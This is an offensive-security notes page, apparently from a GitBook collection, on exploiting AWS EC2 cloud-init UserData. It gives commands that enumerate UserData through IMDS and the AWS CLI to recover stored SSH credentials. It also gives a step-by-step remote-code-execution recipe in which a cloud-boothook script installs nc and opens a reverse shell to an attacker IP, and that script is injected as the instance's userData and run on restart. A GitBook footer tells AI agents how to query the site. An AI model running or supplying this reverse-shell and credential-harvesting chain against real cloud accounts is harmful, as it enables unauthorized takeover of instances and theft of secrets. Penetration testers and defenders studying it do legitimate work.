> For the complete documentation index, see [llms.txt](https://security-notes.gitbook.io/security-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://security-notes.gitbook.io/security-notes/cloud-aws/ec2/cloud-init-exploits.md).

# cloud-init Exploits

## UserData section exploits

### Enumeration

#### On current EC2 instance

Read the following file. Requires sudo or root privileges

```
sudo cat /var/lib/cloud/instance/scripts/part-001
```

Query IMDS

```
IMDS_TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ec2_instance_id=$( curl -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" -s http://169.254.169.254/latest/meta-data/instance-id )
ec2_region=$(curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" http://169.254.169.254/latest/meta-data/placement/region)
aws ec2 describe-instance-attribute --attribute userData --instance-id $ec2_instance_id--region $ec2_region --query UserData --output text  | base64 -d
```

#### Cloudshell

```
aws ec2 describe-instance-attribute --attribute userData --instance-id <instance id> --region <region> --query UserData --output text
```

### Sensitive data

SSH credentials

```
ssh_pwauth: True #ssh password auth enabled
chpasswd:
  list: |
    <user>:<pass>
```

### Remote Code Execution&#x20;

Create a reverse shell as following

```
#cloud-boothook
#!/bin/bash -x
yum install -y nc && nc <ip> <port> -e /bin/bash
```

Encode the file

```
base64 reverse-shell.txt > reverse-shell.enc
```

Stop the instance and modify userData file associated with the instance

```
aws ec2 stop-instances --profile <profile> --instance-ids <instance id>
aws ec2 modify-instance-attribute --profile ec2-capstone --instance-id <ec2 instance id> --attribute userData --value file://reverse-shell.enc
```

Restart the instance to execute the payload. It might take a couple of minutes for the instance to reboot.

```
aws ec2 start-instances --profile <profile> --instance-ids <instance id>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security-notes.gitbook.io/security-notes/cloud-aws/ec2/cloud-init-exploits.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.